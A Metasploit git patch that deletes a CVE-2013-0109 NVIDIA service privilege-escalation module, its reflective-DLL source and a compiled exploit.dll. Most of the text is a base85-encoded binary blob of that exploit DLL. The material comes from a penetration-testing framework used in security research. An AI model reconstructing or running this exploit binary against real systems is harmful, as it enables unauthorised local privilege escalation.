From c7361043ae20a59b9f3fafd0f7fd8a086068593f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Wed, 17 Jul 2013 11:47:06 -0500
Subject: [PATCH] up to date

---
 data/exploits/CVE-2013-0109/exploit.dll       | Bin 52224 -> 0 bytes
 .../source/exploits/cve-2013-0109/LICENSE.txt |  25 -
 .../source/exploits/cve-2013-0109/Readme.md   |  40 --
 .../cve-2013-0109/dll/reflective_dll.sln      |  20 -
 .../cve-2013-0109/dll/reflective_dll.vcproj   | 357 ------------
 .../cve-2013-0109/dll/reflective_dll.vcxproj  | 266 ---------
 .../dll/reflective_dll.vcxproj.filters        |  32 --
 .../dll/reflective_dll.vcxproj.user           |   3 -
 .../dll/src/ReflectiveDLLInjection.h          |  51 --
 .../cve-2013-0109/dll/src/ReflectiveDll.c     |  33 --
 .../cve-2013-0109/dll/src/ReflectiveLoader.c  | 496 ----------------
 .../cve-2013-0109/dll/src/ReflectiveLoader.h  | 203 -------
 .../cve-2013-0109/dll/src/exploit.cpp         | 537 ------------------
 .../source/exploits/cve-2013-0109/rdi.sln     |  32 --
 .../exploits/windows/local/nvidia_nvsvc.rb    | 188 ------
 15 files changed, 2283 deletions(-)
 delete mode 100644 data/exploits/CVE-2013-0109/exploit.dll
 delete mode 100644 external/source/exploits/cve-2013-0109/LICENSE.txt
 delete mode 100644 external/source/exploits/cve-2013-0109/Readme.md
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.sln
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/exploit.cpp
 delete mode 100644 external/source/exploits/cve-2013-0109/rdi.sln
 delete mode 100644 modules/exploits/windows/local/nvidia_nvsvc.rb

diff --git a/data/exploits/CVE-2013-0109/exploit.dll b/data/exploits/CVE-2013-0109/exploit.dll
deleted file mode 100644
index 8fabac9fb53c58ff9f391bfea4fe9104d383554d..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 52224
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
